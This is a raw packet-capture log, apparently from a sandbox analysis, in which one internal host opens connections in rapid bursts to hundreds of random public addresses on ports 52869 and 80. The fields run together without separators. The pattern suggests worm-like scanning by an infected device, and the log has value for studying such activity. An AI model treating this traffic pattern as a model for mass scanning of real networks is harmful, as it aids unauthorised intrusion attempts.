                                                Jul 20, 2024 23:05:33.042597055 CEST2696652869192.168.2.14172.0.119.186
                                                Jul 20, 2024 23:05:33.042597055 CEST2696652869192.168.2.1485.4.149.65
                                                Jul 20, 2024 23:05:33.042597055 CEST2696652869192.168.2.1438.197.81.198
                                                Jul 20, 2024 23:05:33.042597055 CEST2696652869192.168.2.14194.162.163.52
                                                Jul 20, 2024 23:05:33.042627096 CEST5286926966161.40.243.96192.168.2.14
                                                Jul 20, 2024 23:05:33.042635918 CEST528692696698.123.162.170192.168.2.14
                                                Jul 20, 2024 23:05:33.042642117 CEST5286926966140.45.124.85192.168.2.14
                                                Jul 20, 2024 23:05:33.042645931 CEST52869269661.90.234.200192.168.2.14
                                                Jul 20, 2024 23:05:33.042653084 CEST2747880192.168.2.14112.166.160.4
                                                Jul 20, 2024 23:05:33.042653084 CEST2747880192.168.2.14112.77.46.224
                                                Jul 20, 2024 23:05:33.042653084 CEST2747880192.168.2.14112.109.198.251
                                                Jul 20, 2024 23:05:33.042653084 CEST2747880192.168.2.14112.0.202.93
                                                Jul 20, 2024 23:05:33.042654037 CEST2747880192.168.2.14112.251.200.107
                                                Jul 20, 2024 23:05:33.042654037 CEST2747880192.168.2.14112.76.17.207
                                                Jul 20, 2024 23:05:33.042666912 CEST8027478112.105.158.0192.168.2.14
                                                Jul 20, 2024 23:05:33.042673111 CEST5286926966192.47.114.54192.168.2.14
                                                Jul 20, 2024 23:05:33.042676926 CEST5286926966175.118.93.38192.168.2.14
                                                Jul 20, 2024 23:05:33.042680979 CEST8027478112.12.65.114192.168.2.14
                                                Jul 20, 2024 23:05:33.042685986 CEST5286926966149.11.140.219192.168.2.14
                                                Jul 20, 2024 23:05:33.042690039 CEST5286926966206.102.43.209192.168.2.14
                                                Jul 20, 2024 23:05:33.042694092 CEST5286926966149.68.156.54192.168.2.14
                                                Jul 20, 2024 23:05:33.042699099 CEST5286926966142.184.113.112192.168.2.14
                                                Jul 20, 2024 23:05:33.042706013 CEST5286926966184.149.167.202192.168.2.14
                                                Jul 20, 2024 23:05:33.042711020 CEST5286926966101.89.39.240192.168.2.14
                                                Jul 20, 2024 23:05:33.042715073 CEST5286926966163.117.175.205192.168.2.14
                                                Jul 20, 2024 23:05:33.042767048 CEST8027478112.41.70.47192.168.2.14
                                                Jul 20, 2024 23:05:33.042853117 CEST528692696652.157.156.150192.168.2.14
                                                Jul 20, 2024 23:05:33.042984962 CEST5286926966178.148.241.110192.168.2.14
                                                Jul 20, 2024 23:05:33.043036938 CEST5286926966205.58.123.5192.168.2.14
                                                Jul 20, 2024 23:05:33.043042898 CEST5286926966173.166.204.159192.168.2.14
                                                Jul 20, 2024 23:05:33.043369055 CEST8027478112.202.119.210192.168.2.14
                                                Jul 20, 2024 23:05:33.043503046 CEST5286926966153.27.251.6192.168.2.14
                                                Jul 20, 2024 23:05:33.043751955 CEST5286926966153.187.111.58192.168.2.14
                                                Jul 20, 2024 23:05:33.043767929 CEST5286926966206.246.225.132192.168.2.14
                                                Jul 20, 2024 23:05:33.043854952 CEST2696652869192.168.2.144.131.129.231
                                                Jul 20, 2024 23:05:33.043854952 CEST2696652869192.168.2.14143.224.237.76
                                                Jul 20, 2024 23:05:33.043855906 CEST2696652869192.168.2.1454.110.26.167
                                                Jul 20, 2024 23:05:33.043855906 CEST2696652869192.168.2.1447.196.255.231
                                                Jul 20, 2024 23:05:33.043855906 CEST2696652869192.168.2.14193.240.221.66
                                                Jul 20, 2024 23:05:33.043855906 CEST2696652869192.168.2.14190.36.45.109
                                                Jul 20, 2024 23:05:33.043855906 CEST2696652869192.168.2.141.200.60.254
                                                Jul 20, 2024 23:05:33.043855906 CEST2696652869192.168.2.14112.43.125.142
                                                Jul 20, 2024 23:05:33.044214964 CEST2696652869192.168.2.14118.67.218.113
                                                Jul 20, 2024 23:05:33.044214964 CEST2696652869192.168.2.1498.229.30.92
                                                Jul 20, 2024 23:05:33.044214964 CEST2696652869192.168.2.1454.131.38.78
                                                Jul 20, 2024 23:05:33.044214964 CEST2696652869192.168.2.14107.134.33.84
                                                Jul 20, 2024 23:05:33.044214964 CEST2696652869192.168.2.14207.89.76.99
                                                Jul 20, 2024 23:05:33.044214964 CEST2696652869192.168.2.1467.60.162.72
                                                Jul 20, 2024 23:05:33.044214964 CEST2696652869192.168.2.14150.244.195.48
                                                Jul 20, 2024 23:05:33.044214964 CEST2696652869192.168.2.14141.205.10.91
                                                Jul 20, 2024 23:05:33.044322968 CEST528692696652.21.33.116192.168.2.14
                                                Jul 20, 2024 23:05:33.044507980 CEST528692696681.169.73.77192.168.2.14
                                                Jul 20, 2024 23:05:33.044689894 CEST2696652869192.168.2.14220.199.6.254
                                                Jul 20, 2024 23:05:33.044689894 CEST2696652869192.168.2.14164.181.30.225
                                                Jul 20, 2024 23:05:33.044689894 CEST2696652869192.168.2.14185.214.68.105
                                                Jul 20, 2024 23:05:33.044689894 CEST2696652869192.168.2.14141.176.146.131
                                                Jul 20, 2024 23:05:33.044689894 CEST2696652869192.168.2.14106.18.107.102
                                                Jul 20, 2024 23:05:33.044689894 CEST2696652869192.168.2.14188.80.8.123
                                                Jul 20, 2024 23:05:33.044689894 CEST2696652869192.168.2.14186.150.62.98
                                                Jul 20, 2024 23:05:33.044689894 CEST2696652869192.168.2.1469.214.230.167
                                                Jul 20, 2024 23:05:33.044795990 CEST2696652869192.168.2.14177.53.146.174
                                                Jul 20, 2024 23:05:33.044795990 CEST2696652869192.168.2.1465.157.107.193
                                                Jul 20, 2024 23:05:33.044795990 CEST2696652869192.168.2.1492.137.79.207
                                                Jul 20, 2024 23:05:33.044795990 CEST2696652869192.168.2.14165.70.80.231
                                                Jul 20, 2024 23:05:33.044795990 CEST2696652869192.168.2.1418.110.155.225
                                                Jul 20, 2024 23:05:33.044795990 CEST2696652869192.168.2.14196.108.112.123
                                                Jul 20, 2024 23:05:33.044795990 CEST2696652869192.168.2.1453.222.6.176
                                                Jul 20, 2024 23:05:33.044795990 CEST2696652869192.168.2.14195.222.193.86
                                                Jul 20, 2024 23:05:33.044859886 CEST2696652869192.168.2.1451.167.61.166
                                                Jul 20, 2024 23:05:33.044859886 CEST2696652869192.168.2.1485.175.45.98
                                                Jul 20, 2024 23:05:33.044859886 CEST2696652869192.168.2.14217.43.218.43
                                                Jul 20, 2024 23:05:33.044859886 CEST2696652869192.168.2.1482.78.211.185
                                                Jul 20, 2024 23:05:33.044859886 CEST2696652869192.168.2.1438.61.168.140
                                                Jul 20, 2024 23:05:33.044859886 CEST2696652869192.168.2.1498.139.13.162
                                                Jul 20, 2024 23:05:33.044859886 CEST2696652869192.168.2.14121.106.252.79
                                                Jul 20, 2024 23:05:33.044859886 CEST2696652869192.168.2.14120.95.45.235
                                                Jul 20, 2024 23:05:33.045217037 CEST5286926966197.172.172.172192.168.2.14
                                                Jul 20, 2024 23:05:33.045363903 CEST5286926966211.127.230.111192.168.2.14
                                                Jul 20, 2024 23:05:33.045630932 CEST5286926966178.111.133.26192.168.2.14
                                                Jul 20, 2024 23:05:33.045715094 CEST2696652869192.168.2.14213.158.240.161
                                                Jul 20, 2024 23:05:33.045715094 CEST2747880192.168.2.14112.182.58.26
                                                Jul 20, 2024 23:05:33.045715094 CEST2747880192.168.2.14112.88.147.243
                                                Jul 20, 2024 23:05:33.045715094 CEST2747880192.168.2.14112.161.14.42
                                                Jul 20, 2024 23:05:33.045715094 CEST2747880192.168.2.14112.122.161.48
                                                Jul 20, 2024 23:05:33.045715094 CEST2747880192.168.2.14112.220.231.207
                                                Jul 20, 2024 23:05:33.045715094 CEST2747880192.168.2.14112.15.225.159
                                                Jul 20, 2024 23:05:33.045715094 CEST2747880192.168.2.14112.51.119.134
                                                Jul 20, 2024 23:05:33.045922041 CEST5286926966108.14.43.116192.168.2.14
                                                Jul 20, 2024 23:05:33.046039104 CEST2747880192.168.2.14112.126.224.249
                                                Jul 20, 2024 23:05:33.046039104 CEST2747880192.168.2.14112.105.158.0
                                                Jul 20, 2024 23:05:33.046039104 CEST2747880192.168.2.14112.12.65.114
                                                Jul 20, 2024 23:05:33.046039104 CEST2747880192.168.2.14112.41.70.47
                                                Jul 20, 2024 23:05:33.046039104 CEST2747880192.168.2.14112.202.119.210
                                                Jul 20, 2024 23:05:33.046267033 CEST2696652869192.168.2.1497.209.81.243
                                                Jul 20, 2024 23:05:33.046267033 CEST2696652869192.168.2.1485.247.165.191
                                                Jul 20, 2024 23:05:33.046267033 CEST2696652869192.168.2.1492.77.87.1
                                                Jul 20, 2024 23:05:33.046267033 CEST2696652869192.168.2.14150.96.238.152
                                                Jul 20, 2024 23:05:33.046267033 CEST2696652869192.168.2.1490.61.9.169
                                                Jul 20, 2024 23:05:33.046267033 CEST2696652869192.168.2.1461.32.26.75
                                                Jul 20, 2024 23:05:33.046267033 CEST2696652869192.168.2.1482.159.219.103
                                                Jul 20, 2024 23:05:33.046267033 CEST2696652869192.168.2.1497.16.17.144
                                                Jul 20, 2024 23:05:33.046574116 CEST5286926966186.130.210.50192.168.2.14
                                                Jul 20, 2024 23:05:33.047080040 CEST2696652869192.168.2.14152.244.165.188
                                                Jul 20, 2024 23:05:33.047080040 CEST2696652869192.168.2.1465.216.119.249
                                                Jul 20, 2024 23:05:33.047080040 CEST2696652869192.168.2.14112.1.16.181
                                                Jul 20, 2024 23:05:33.047080994 CEST2696652869192.168.2.1485.105.71.90
                                                Jul 20, 2024 23:05:33.047080994 CEST2696652869192.168.2.1427.160.62.200
                                                Jul 20, 2024 23:05:33.047080994 CEST2696652869192.168.2.14137.41.194.85
                                                Jul 20, 2024 23:05:33.047080994 CEST2696652869192.168.2.14183.241.177.98
                                                Jul 20, 2024 23:05:33.047080994 CEST2696652869192.168.2.14180.23.68.244
                                                Jul 20, 2024 23:05:33.047141075 CEST5286926966103.221.230.248192.168.2.14
                                                Jul 20, 2024 23:05:33.047472954 CEST5286926966201.119.244.156192.168.2.14
                                                Jul 20, 2024 23:05:33.047694921 CEST2696652869192.168.2.141.99.86.190
                                                Jul 20, 2024 23:05:33.047694921 CEST2696652869192.168.2.14209.220.236.123
                                                Jul 20, 2024 23:05:33.047694921 CEST2696652869192.168.2.14210.207.158.75
                                                Jul 20, 2024 23:05:33.047694921 CEST2696652869192.168.2.14110.31.121.245
                                                Jul 20, 2024 23:05:33.047696114 CEST2696652869192.168.2.14117.95.128.133
                                                Jul 20, 2024 23:05:33.047696114 CEST2696652869192.168.2.14165.147.179.20
                                                Jul 20, 2024 23:05:33.047696114 CEST2696652869192.168.2.1482.15.183.70
                                                Jul 20, 2024 23:05:33.047696114 CEST2696652869192.168.2.14173.7.240.79
                                                Jul 20, 2024 23:05:33.047708988 CEST5286926966195.50.250.15192.168.2.14
                                                Jul 20, 2024 23:05:33.047847986 CEST528692696690.220.223.3192.168.2.14
                                                Jul 20, 2024 23:05:33.048073053 CEST2747880192.168.2.14112.76.62.37
                                                Jul 20, 2024 23:05:33.048073053 CEST2747880192.168.2.14112.153.101.51
                                                Jul 20, 2024 23:05:33.048073053 CEST2747880192.168.2.14112.48.130.177
                                                Jul 20, 2024 23:05:33.048073053 CEST2747880192.168.2.14112.141.26.126
                                                Jul 20, 2024 23:05:33.048073053 CEST2747880192.168.2.14112.9.91.248
                                                Jul 20, 2024 23:05:33.048073053 CEST2747880192.168.2.14112.149.129.109
                                                Jul 20, 2024 23:05:33.048074007 CEST2747880192.168.2.14112.98.154.204
                                                Jul 20, 2024 23:05:33.048074007 CEST2747880192.168.2.14112.36.235.2
                                                Jul 20, 2024 23:05:33.048594952 CEST528692696640.10.56.22192.168.2.14
                                                Jul 20, 2024 23:05:33.049066067 CEST52869269664.131.129.231192.168.2.14
                                                Jul 20, 2024 23:05:33.049161911 CEST2696652869192.168.2.14193.99.153.2
                                                Jul 20, 2024 23:05:33.049161911 CEST2696652869192.168.2.1443.205.58.252
                                                Jul 20, 2024 23:05:33.049161911 CEST2696652869192.168.2.1427.95.215.67
                                                Jul 20, 2024 23:05:33.049161911 CEST2696652869192.168.2.1431.132.211.74
                                                Jul 20, 2024 23:05:33.049161911 CEST2696652869192.168.2.14112.144.117.53
                                                Jul 20, 2024 23:05:33.049161911 CEST2696652869192.168.2.1418.121.112.158
                                                Jul 20, 2024 23:05:33.049161911 CEST2696652869192.168.2.1437.147.173.115
                                                Jul 20, 2024 23:05:33.049161911 CEST2696652869192.168.2.1460.161.69.144
                                                Jul 20, 2024 23:05:33.050065041 CEST2696652869192.168.2.1454.128.174.144
                                                Jul 20, 2024 23:05:33.050065041 CEST2696652869192.168.2.1480.62.127.123
                                                Jul 20, 2024 23:05:33.050065041 CEST2696652869192.168.2.14159.117.194.230
                                                Jul 20, 2024 23:05:33.050065041 CEST2696652869192.168.2.1476.86.55.19
                                                Jul 20, 2024 23:05:33.050065041 CEST2696652869192.168.2.1425.171.112.6
                                                Jul 20, 2024 23:05:33.050065041 CEST2696652869192.168.2.1439.43.47.234
                                                Jul 20, 2024 23:05:33.050065041 CEST2696652869192.168.2.14136.88.162.193
                                                Jul 20, 2024 23:05:33.050065041 CEST2696652869192.168.2.1450.215.12.246
                                                Jul 20, 2024 23:05:33.050179958 CEST2696652869192.168.2.14126.114.24.17
                                                Jul 20, 2024 23:05:33.050179958 CEST2696652869192.168.2.14118.186.128.48
                                                Jul 20, 2024 23:05:33.050180912 CEST2696652869192.168.2.1444.23.137.165
                                                Jul 20, 2024 23:05:33.050180912 CEST2696652869192.168.2.14188.17.128.154
                                                Jul 20, 2024 23:05:33.050180912 CEST2696652869192.168.2.1438.48.151.60
                                                Jul 20, 2024 23:05:33.050180912 CEST2696652869192.168.2.1446.109.202.86
                                                Jul 20, 2024 23:05:33.050180912 CEST2696652869192.168.2.14118.109.249.7
                                                Jul 20, 2024 23:05:33.050180912 CEST2696652869192.168.2.14116.200.162.193
                                                Jul 20, 2024 23:05:33.050338030 CEST2696652869192.168.2.14121.110.130.34
                                                Jul 20, 2024 23:05:33.050338030 CEST2696652869192.168.2.1413.63.32.62
                                                Jul 20, 2024 23:05:33.050338030 CEST2696652869192.168.2.14124.174.241.167
                                                Jul 20, 2024 23:05:33.050338030 CEST2696652869192.168.2.14183.117.60.248
                                                Jul 20, 2024 23:05:33.050338030 CEST2696652869192.168.2.1483.156.160.135
                                                Jul 20, 2024 23:05:33.050338030 CEST2696652869192.168.2.14169.229.211.152
                                                Jul 20, 2024 23:05:33.050338030 CEST2696652869192.168.2.14196.64.98.42
                                                Jul 20, 2024 23:05:33.050338030 CEST2696652869192.168.2.1485.150.230.122
                                                Jul 20, 2024 23:05:33.050554037 CEST2696652869192.168.2.14193.33.82.185
                                                Jul 20, 2024 23:05:33.050554037 CEST2696652869192.168.2.14211.133.37.129
                                                Jul 20, 2024 23:05:33.050554037 CEST2696652869192.168.2.141.250.42.181
                                                Jul 20, 2024 23:05:33.050554037 CEST2696652869192.168.2.14195.24.203.251
                                                Jul 20, 2024 23:05:33.050554037 CEST2696652869192.168.2.14154.62.100.64
                                                Jul 20, 2024 23:05:33.050554037 CEST2696652869192.168.2.14152.63.221.175
                                                Jul 20, 2024 23:05:33.050554037 CEST2696652869192.168.2.14145.75.24.79
                                                Jul 20, 2024 23:05:33.050554037 CEST2747880192.168.2.14112.230.48.95
                                                Jul 20, 2024 23:05:33.050980091 CEST2747880192.168.2.14112.16.160.76
                                                Jul 20, 2024 23:05:33.050980091 CEST2747880192.168.2.14112.208.125.164
                                                Jul 20, 2024 23:05:33.050980091 CEST2747880192.168.2.14112.59.20.247
                                                Jul 20, 2024 23:05:33.050980091 CEST2747880192.168.2.14112.154.115.76
                                                Jul 20, 2024 23:05:33.050980091 CEST2747880192.168.2.14112.99.160.126
                                                Jul 20, 2024 23:05:33.051155090 CEST5286926966143.224.237.76192.168.2.14
                                                Jul 20, 2024 23:05:33.051243067 CEST8027478112.182.58.26192.168.2.14
                                                Jul 20, 2024 23:05:33.051259041 CEST2696652869192.168.2.14123.158.203.54
                                                Jul 20, 2024 23:05:33.051259041 CEST2696652869192.168.2.14180.116.122.202
                                                Jul 20, 2024 23:05:33.051259041 CEST2696652869192.168.2.1462.152.186.71
                                                Jul 20, 2024 23:05:33.051259041 CEST2696652869192.168.2.14174.126.233.138
                                                Jul 20, 2024 23:05:33.051259041 CEST2747880192.168.2.14112.4.21.98
                                                Jul 20, 2024 23:05:33.051259041 CEST2747880192.168.2.14112.227.28.160
                                                Jul 20, 2024 23:05:33.051259041 CEST2696652869192.168.2.1451.193.232.254
                                                Jul 20, 2024 23:05:33.051259041 CEST2747880192.168.2.14112.91.26.146
                                                Jul 20, 2024 23:05:33.051407099 CEST528692696654.110.26.167192.168.2.14
                                                Jul 20, 2024 23:05:33.052073956 CEST8027478112.88.147.243192.168.2.14
                                                Jul 20, 2024 23:05:33.052129984 CEST8027478112.161.14.42192.168.2.14
                                                Jul 20, 2024 23:05:33.052385092 CEST2747880192.168.2.14112.182.58.26
                                                Jul 20, 2024 23:05:33.052385092 CEST2747880192.168.2.14112.88.147.243
                                                Jul 20, 2024 23:05:33.052385092 CEST2747880192.168.2.14112.161.14.42
                                                Jul 20, 2024 23:05:33.052768946 CEST528692696647.196.255.231192.168.2.14
                                                Jul 20, 2024 23:05:33.052817106 CEST8027478112.122.161.48192.168.2.14
                                                Jul 20, 2024 23:05:33.052822113 CEST8027478112.220.231.207192.168.2.14
                                                Jul 20, 2024 23:05:33.052831888 CEST8027478112.15.225.159192.168.2.14
                                                Jul 20, 2024 23:05:33.052835941 CEST8027478112.51.119.134192.168.2.14
                                                Jul 20, 2024 23:05:33.052865028 CEST2747880192.168.2.14112.122.161.48
                                                Jul 20, 2024 23:05:33.052865982 CEST2747880192.168.2.14112.220.231.207
                                                Jul 20, 2024 23:05:33.052865982 CEST2747880192.168.2.14112.15.225.159
                                                Jul 20, 2024 23:05:33.052910089 CEST2747880192.168.2.14112.6.22.42
                                                Jul 20, 2024 23:05:33.052910089 CEST2747880192.168.2.14112.50.18.202
                                                Jul 20, 2024 23:05:33.052910089 CEST2696652869192.168.2.148.113.169.77
                                                Jul 20, 2024 23:05:33.052910089 CEST2747880192.168.2.14112.121.191.90
                                                Jul 20, 2024 23:05:33.052910089 CEST2747880192.168.2.14112.207.103.168
                                                Jul 20, 2024 23:05:33.052910089 CEST2747880192.168.2.14112.201.249.164
                                                Jul 20, 2024 23:05:33.052910089 CEST2747880192.168.2.14112.249.237.106
                                                Jul 20, 2024 23:05:33.052910089 CEST2747880192.168.2.14112.112.170.29
                                                Jul 20, 2024 23:05:33.053026915 CEST2747880192.168.2.14112.28.245.27
                                                Jul 20, 2024 23:05:33.053026915 CEST2696652869192.168.2.14193.239.18.218
                                                Jul 20, 2024 23:05:33.053026915 CEST2747880192.168.2.14112.69.254.170
                                                Jul 20, 2024 23:05:33.053026915 CEST2747880192.168.2.14112.40.70.109
                                                Jul 20, 2024 23:05:33.053026915 CEST2747880192.168.2.14112.178.137.80
                                                Jul 20, 2024 23:05:33.053026915 CEST2747880192.168.2.14112.80.80.155
                                                Jul 20, 2024 23:05:33.053026915 CEST2696652869192.168.2.14172.225.199.211
                                                Jul 20, 2024 23:05:33.053026915 CEST2747880192.168.2.14112.91.135.215
                                                Jul 20, 2024 23:05:33.053137064 CEST5286926966193.240.221.66192.168.2.14
                                                Jul 20, 2024 23:05:33.053232908 CEST2696652869192.168.2.14143.4.216.144
                                                Jul 20, 2024 23:05:33.053232908 CEST2696652869192.168.2.14184.6.234.16
                                                Jul 20, 2024 23:05:33.053232908 CEST2696652869192.168.2.14142.192.95.15
                                                Jul 20, 2024 23:05:33.053232908 CEST2696652869192.168.2.14122.33.199.40
                                                Jul 20, 2024 23:05:33.053232908 CEST2696652869192.168.2.14186.222.177.217
                                                Jul 20, 2024 23:05:33.053232908 CEST2696652869192.168.2.1446.175.20.171
                                                Jul 20, 2024 23:05:33.053232908 CEST2696652869192.168.2.14199.65.206.253
                                                Jul 20, 2024 23:05:33.053232908 CEST2696652869192.168.2.1418.231.237.110
                                                Jul 20, 2024 23:05:33.053281069 CEST8027478112.76.62.37192.168.2.14
                                                Jul 20, 2024 23:05:33.053416014 CEST8027478112.153.101.51192.168.2.14
                                                Jul 20, 2024 23:05:33.053524017 CEST2696652869192.168.2.1466.137.240.254
                                                Jul 20, 2024 23:05:33.053524017 CEST2696652869192.168.2.14207.136.37.166
                                                Jul 20, 2024 23:05:33.053524017 CEST2696652869192.168.2.14169.254.120.121
                                                Jul 20, 2024 23:05:33.053524017 CEST2696652869192.168.2.1461.207.64.15
                                                Jul 20, 2024 23:05:33.053524017 CEST2696652869192.168.2.1490.31.183.200
                                                Jul 20, 2024 23:05:33.053524017 CEST2696652869192.168.2.1464.198.194.123
                                                Jul 20, 2024 23:05:33.053524017 CEST2696652869192.168.2.1440.25.221.6
                                                Jul 20, 2024 23:05:33.053592920 CEST5286926966190.36.45.109192.168.2.14
                                                Jul 20, 2024 23:05:33.053724051 CEST52869269661.200.60.254192.168.2.14
                                                Jul 20, 2024 23:05:33.053752899 CEST2696652869192.168.2.14140.68.250.17
                                                Jul 20, 2024 23:05:33.053752899 CEST2696652869192.168.2.14170.227.203.115
                                                Jul 20, 2024 23:05:33.053752899 CEST2696652869192.168.2.14216.132.104.176
                                                Jul 20, 2024 23:05:33.053752899 CEST2696652869192.168.2.1487.51.246.54
                                                Jul 20, 2024 23:05:33.053752899 CEST2696652869192.168.2.1446.63.251.77
                                                Jul 20, 2024 23:05:33.053752899 CEST2696652869192.168.2.1423.219.163.155
                                                Jul 20, 2024 23:05:33.053752899 CEST2696652869192.168.2.1492.45.70.101
                                                Jul 20, 2024 23:05:33.053752899 CEST2747880192.168.2.14112.252.3.32
                                                Jul 20, 2024 23:05:33.053874016 CEST8027478112.48.130.177192.168.2.14
                                                Jul 20, 2024 23:05:33.053963900 CEST2747880192.168.2.14112.51.119.134
                                                Jul 20, 2024 23:05:33.053963900 CEST2747880192.168.2.14112.76.62.37
                                                Jul 20, 2024 23:05:33.053965092 CEST2747880192.168.2.14112.153.101.51
                                                Jul 20, 2024 23:05:33.053965092 CEST2747880192.168.2.14112.48.130.177
                                                Jul 20, 2024 23:05:33.054160118 CEST2696652869192.168.2.14155.23.85.42
                                                Jul 20, 2024 23:05:33.054160118 CEST2696652869192.168.2.14165.2.157.114
                                                Jul 20, 2024 23:05:33.054160118 CEST2696652869192.168.2.14205.104.12.233
                                                Jul 20, 2024 23:05:33.054160118 CEST2696652869192.168.2.14131.247.147.51
                                                Jul 20, 2024 23:05:33.054160118 CEST2696652869192.168.2.1451.162.165.104
                                                Jul 20, 2024 23:05:33.054160118 CEST2696652869192.168.2.1435.174.156.60
                                                Jul 20, 2024 23:05:33.054160118 CEST2696652869192.168.2.14189.118.182.34
                                                Jul 20, 2024 23:05:33.054160118 CEST2696652869192.168.2.14114.32.182.175
                                                Jul 20, 2024 23:05:33.054368019 CEST8027478112.141.26.126192.168.2.14
                                                Jul 20, 2024 23:05:33.054409027 CEST8027478112.9.91.248192.168.2.14
                                                Jul 20, 2024 23:05:33.054601908 CEST8027478112.149.129.109192.168.2.14
                                                Jul 20, 2024 23:05:33.054852009 CEST5286926966112.43.125.142192.168.2.14
                                                Jul 20, 2024 23:05:33.055033922 CEST2747880192.168.2.14112.141.26.126
                                                Jul 20, 2024 23:05:33.055033922 CEST2747880192.168.2.14112.9.91.248
                                                Jul 20, 2024 23:05:33.055033922 CEST2747880192.168.2.14112.149.129.109
                                                Jul 20, 2024 23:05:33.055428028 CEST8027478112.98.154.204192.168.2.14
                                                Jul 20, 2024 23:05:33.055553913 CEST2747880192.168.2.14112.59.145.113
                                                Jul 20, 2024 23:05:33.055553913 CEST2747880192.168.2.14112.120.212.189
                                                Jul 20, 2024 23:05:33.055553913 CEST2747880192.168.2.14112.35.156.109
                                                Jul 20, 2024 23:05:33.055553913 CEST2696652869192.168.2.14156.31.206.77
                                                Jul 20, 2024 23:05:33.055553913 CEST2747880192.168.2.14112.168.192.109
                                                Jul 20, 2024 23:05:33.055553913 CEST2747880192.168.2.14112.104.164.227
                                                Jul 20, 2024 23:05:33.055553913 CEST2696652869192.168.2.1458.139.133.159
                                                Jul 20, 2024 23:05:33.055623055 CEST2747880192.168.2.14112.234.29.152
                                                Jul 20, 2024 23:05:33.055623055 CEST2747880192.168.2.14112.228.61.167
                                                Jul 20, 2024 23:05:33.055623055 CEST2747880192.168.2.14112.159.233.113
                                                Jul 20, 2024 23:05:33.055623055 CEST2747880192.168.2.14112.175.7.13
                                                Jul 20, 2024 23:05:33.055623055 CEST2747880192.168.2.14112.32.113.241
                                                Jul 20, 2024 23:05:33.055623055 CEST2747880192.168.2.14112.37.98.75
                                                Jul 20, 2024 23:05:33.055623055 CEST2747880192.168.2.14112.180.71.61
                                                Jul 20, 2024 23:05:33.055623055 CEST2747880192.168.2.14112.208.129.20
                                                Jul 20, 2024 23:05:33.055679083 CEST2747880192.168.2.14112.53.81.29
                                                Jul 20, 2024 23:05:33.055679083 CEST2747880192.168.2.14112.167.244.83
                                                Jul 20, 2024 23:05:33.055680037 CEST2747880192.168.2.14112.59.116.132
                                                Jul 20, 2024 23:05:33.055680037 CEST2747880192.168.2.14112.156.156.146
                                                Jul 20, 2024 23:05:33.055680037 CEST2696652869192.168.2.1484.158.3.142
                                                Jul 20, 2024 23:05:33.055680037 CEST2747880192.168.2.14112.244.3.43
                                                Jul 20, 2024 23:05:33.055680037 CEST2747880192.168.2.14112.68.0.197
                                                Jul 20, 2024 23:05:33.055680037 CEST2747880192.168.2.14112.242.249.115
                                                Jul 20, 2024 23:05:33.055947065 CEST8027478112.36.235.2192.168.2.14
                                                Jul 20, 2024 23:05:33.056011915 CEST8027478112.16.160.76192.168.2.14
                                                Jul 20, 2024 23:05:33.056015968 CEST8027478112.208.125.164192.168.2.14
                                                Jul 20, 2024 23:05:33.056216955 CEST2747880192.168.2.14112.98.154.204
                                                Jul 20, 2024 23:05:33.056216955 CEST2747880192.168.2.14112.36.235.2
                                                Jul 20, 2024 23:05:33.056216955 CEST2747880192.168.2.14112.16.160.76
                                                Jul 20, 2024 23:05:33.056216955 CEST2747880192.168.2.14112.208.125.164
                                                Jul 20, 2024 23:05:33.056430101 CEST8027478112.59.20.247192.168.2.14
                                                Jul 20, 2024 23:05:33.056474924 CEST2696652869192.168.2.14107.236.92.7
                                                Jul 20, 2024 23:05:33.056474924 CEST2696652869192.168.2.1420.216.131.64
                                                Jul 20, 2024 23:05:33.056474924 CEST2696652869192.168.2.14180.45.45.50
                                                Jul 20, 2024 23:05:33.056474924 CEST2696652869192.168.2.14199.111.27.70
                                                Jul 20, 2024 23:05:33.056474924 CEST2747880192.168.2.14112.167.150.105
                                                Jul 20, 2024 23:05:33.056474924 CEST2747880192.168.2.14112.159.31.135
                                                Jul 20, 2024 23:05:33.056474924 CEST2747880192.168.2.14112.122.99.216
                                                Jul 20, 2024 23:05:33.056474924 CEST2747880192.168.2.14112.13.79.12
                                                Jul 20, 2024 23:05:33.056637049 CEST8027478112.154.115.76192.168.2.14
                                                Jul 20, 2024 23:05:33.057049036 CEST8027478112.99.160.126192.168.2.14
                                                Jul 20, 2024 23:05:33.057085037 CEST2747880192.168.2.14112.59.20.247
                                                Jul 20, 2024 23:05:33.057085037 CEST2747880192.168.2.14112.154.115.76
                                                Jul 20, 2024 23:05:33.057085037 CEST2747880192.168.2.14112.99.160.126
                                                Jul 20, 2024 23:05:33.057122946 CEST2696652869192.168.2.1485.86.121.204
                                                Jul 20, 2024 23:05:33.057122946 CEST2696652869192.168.2.1443.12.207.236
                                                Jul 20, 2024 23:05:33.057122946 CEST2696652869192.168.2.14202.36.177.37
                                                Jul 20, 2024 23:05:33.057122946 CEST2696652869192.168.2.14222.204.98.53
                                                Jul 20, 2024 23:05:33.057122946 CEST2696652869192.168.2.149.51.190.70
                                                Jul 20, 2024 23:05:33.057122946 CEST2696652869192.168.2.14177.27.154.86
                                                Jul 20, 2024 23:05:33.057122946 CEST2696652869192.168.2.1436.251.174.207
                                                Jul 20, 2024 23:05:33.057122946 CEST2696652869192.168.2.14121.196.94.167
                                                Jul 20, 2024 23:05:33.057203054 CEST8027478112.4.21.98192.168.2.14
                                                Jul 20, 2024 23:05:33.057310104 CEST8027478112.227.28.160192.168.2.14
                                                Jul 20, 2024 23:05:33.057326078 CEST2696652869192.168.2.14170.140.251.190
                                                Jul 20, 2024 23:05:33.057326078 CEST2696652869192.168.2.14196.127.130.191
                                                Jul 20, 2024 23:05:33.057326078 CEST2696652869192.168.2.1446.211.90.158
                                                Jul 20, 2024 23:05:33.057326078 CEST2696652869192.168.2.14133.153.173.78
                                                Jul 20, 2024 23:05:33.057326078 CEST2696652869192.168.2.1441.29.43.188
                                                Jul 20, 2024 23:05:33.057326078 CEST2696652869192.168.2.14129.184.192.128
                                                Jul 20, 2024 23:05:33.057326078 CEST2696652869192.168.2.1451.49.173.168
                                                Jul 20, 2024 23:05:33.057326078 CEST2696652869192.168.2.1461.121.97.147
                                                Jul 20, 2024 23:05:33.057666063 CEST2696652869192.168.2.14129.191.176.166
                                                Jul 20, 2024 23:05:33.057666063 CEST2696652869192.168.2.14117.201.37.91
                                                Jul 20, 2024 23:05:33.057666063 CEST2696652869192.168.2.142.57.48.113
                                                Jul 20, 2024 23:05:33.057666063 CEST2696652869192.168.2.1438.21.209.85
                                                Jul 20, 2024 23:05:33.057666063 CEST2696652869192.168.2.14115.84.154.33
                                                Jul 20, 2024 23:05:33.057666063 CEST2696652869192.168.2.1435.90.109.228
                                                Jul 20, 2024 23:05:33.057667017 CEST2696652869192.168.2.14197.136.164.81
                                                Jul 20, 2024 23:05:33.057667017 CEST2696652869192.168.2.14204.196.26.7
